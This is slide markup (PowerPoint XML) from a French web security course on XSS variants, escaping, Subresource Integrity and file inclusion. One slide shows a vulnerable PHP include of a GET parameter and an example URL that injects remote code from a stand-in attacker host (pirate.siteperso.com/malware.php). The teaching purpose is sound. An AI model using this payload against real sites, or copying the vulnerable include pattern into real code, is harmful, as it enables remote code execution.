          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="1349050"/>
            <a:ext cx="10258608" cy="4708981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
              <a:alpha val="65000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Le « Cross Site Scripting », consiste en l’injection de contenu dans une page web dans le but de provoquer un comportement particulier du navigateur qui interprète cette page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" u="sng" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSS stockée </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>le pirate va envoyer un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>contenu malicieux dans une application web, qui va le stocker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (par exemple dans une base de données). Ensuite, le contenu malicieux sera </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>retourné dans le navigateur des autres utilisateurs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> lorsqu’ils iront sur le site.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" u="sng" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSS reflétée </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Le contenu malicieux est par exemple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>livré à la victime via une URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" u="sng" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSS basée sur le DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> passent directement dans le navigateur de la victime</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Les données externes employées dans quelque partie que ce soit de la réponse envoyée au client doivent avoir fait l’objet d’un « échappement »</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>il est important de vérifier chaque fois que c’est possible que les données ont bien la forme attendue (liste blanche ou regex)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Spécifier un Content-Type (type MIME) approprié</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36800497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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="685800"/>
            <a:ext cx="8001000" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Introduction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="ZoneTexte 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B14427F-3B6F-4744-8519-A20A524041D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="887106" y="2292824"/>
            <a:ext cx="9580870" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>n système est aussi sûr que son maillon le plus faible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" b="0" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>La meilleure sécurité est suffisamment discrète pour répondre aux besoins sans ajouter de contraintes irritantes pour l'utilisateur</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Peu importe que vous ayez un grand portail ou un petit site web, vous pouvez être une cible</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"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304139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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="386000"/>
            <a:ext cx="8001000" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les attaques XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="ZoneTexte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22A84B7F-9996-467C-8B6E-9D1FE1E149BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="1349050"/>
            <a:ext cx="10258608" cy="2616101"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>En JS, l’exemple ci-après montre l’utilisation de fonctions d’échappement :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>welcome.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>fetch-and-escape.js</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDCCB2D4-C441-480D-B66F-DCAF0C3F80EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3595296" y="3296284"/>
            <a:ext cx="6911830" cy="2921635"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Image 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A45A7FE1-3515-48FB-95B4-1B9BEA90C248}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3595296" y="1802674"/>
            <a:ext cx="6899062" cy="1275118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14436389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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="386000"/>
            <a:ext cx="8001000" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les attaques XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="ZoneTexte 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B70D369D-9996-4C7B-B462-605BD6FC6B15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="1373838"/>
            <a:ext cx="11059150" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
              <a:alpha val="59000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Utiliser la vérification de l’intégrité des ressources issues d’un CDN, tel que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Subresource</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Integrity</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://developer.mozilla.org/fr/docs/Web/Security/Subresource_Integrity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCD05239-14E7-43CF-845F-9AF3175116D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2798339" y="2020169"/>
            <a:ext cx="6058746" cy="838317"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Image 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B67669BB-7789-4D70-9498-E329F89B3176}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2798339" y="2918679"/>
            <a:ext cx="6058746" cy="3553321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34475776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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684211" y="685800"/>
            <a:ext cx="10603381" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>inJECTions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> de fichiers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="ZoneTexte 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CD86D18-954C-4B2C-82CD-B8560ED2B6F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684208" y="1674844"/>
            <a:ext cx="10093719" cy="2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="85000"/>
              <a:lumOff val="15000"/>
              <a:alpha val="49000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>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https://www.example.org/fiche_produit.php?id=article5</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>comprend l’instruction </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>( $_GET[’id’] . ’.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pour stocker chaque description de produit dans un fichier séparé.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Un attaquant peut alors donner à la variable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> la valeur </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>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http://pirate.siteperso.com/malware</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>après encodage URL, donc :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>https://www.example.org/fiche_produit.php? id=http://pirate.siteperso.com/malware.php </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Il aura ainsi injecté le fichier http://pirate.siteperso.com/malware.php dans le code de l’application.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="ZoneTexte 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
